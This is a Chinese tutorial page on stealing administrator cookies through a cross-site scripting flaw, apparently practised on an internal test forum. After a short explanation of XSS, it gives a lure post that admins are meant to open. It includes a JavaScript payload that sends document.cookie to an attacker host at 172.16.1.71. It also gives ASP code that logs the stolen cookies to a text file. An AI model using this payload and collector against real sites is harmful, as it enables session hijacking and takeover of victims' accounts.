您的当前位置:首页正文

Cookie窃取

来源:一二三四网


利用xss漏洞进行Cookie窃取

背景知识

Xss就是跨站脚本攻击XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意脚本代码,当用户浏览该页之时,嵌入其中Web里面的脚本代码会被执行,从而达到恶意攻击的特殊目的。

Xss攻击过程

下面是跨站脚本攻击过程的示意图,它详细的展示了攻击的五个步骤。首先,用户点击了黑客发来的电子邮件中的一个嵌入的链接(第1步)。由于跨站点脚本攻击缺陷的原因,这样会导致用户的浏览器向Web 站点发送一个请求(第2步);服务器端根据该请求会生成一个包含恶意脚本的响应,并将其发回给用户的浏览器(第3步)。当用户的机器执行返回的恶意代码时(第4步),就会将用户的敏感数据发送给黑客的计算机(第5步)。

窃取方法

在Cookie攻击的方法中Cookie窃取是最常用的方式,攻击者在窃取管理员的Cookie后,冒用管理员的身份进行登录,以获取管理员的权限。在本文中我通过一个具有xss漏洞的网站来窃取管理员的Cookie。首先我在网站上发表具有攻击脚本的帖子,当管理员浏览我的帖子时,攻击脚本就开始执行,将管理员的Cookie记录到我指定的文件中(省去了xss攻击过程的第1步)。

窃取过程及代码

首先在论坛(测试部内部搭建的bbsxp论坛)上发表一个帖子,例如帖子标题为“管理员不能看的帖子”,人都有好奇心,你越告诉他不能看,他越看(结果只有一个,上当了),输

javascript:window.open(‘http://172.16.1.71/Cookies.asp?msg=’

+document.Cookie) ;

再次自建一个网站,建立一个asp文档代码如下:

testfile=Server.MapPath(\"cookmm.txt\")

msg=Request.QueryString

set fs=server.CreateObject(\"scripting.filesystemobject\")

set thisfile=fs.OpenTextFile(testfile,8,True,0)

thisfile.WriteLine(\"\"&msg& \"\")

thisfile.closeset fs = nothing

接着就是在网站目录下创建一cookmm.txt文件;

当管理员浏览了我的帖子时,在cookmm.txt文件就记录了管理员的Cookie;

获取到的Cookie信息

因篇幅问题不能全部显示,请点此查看更多更全内容

Top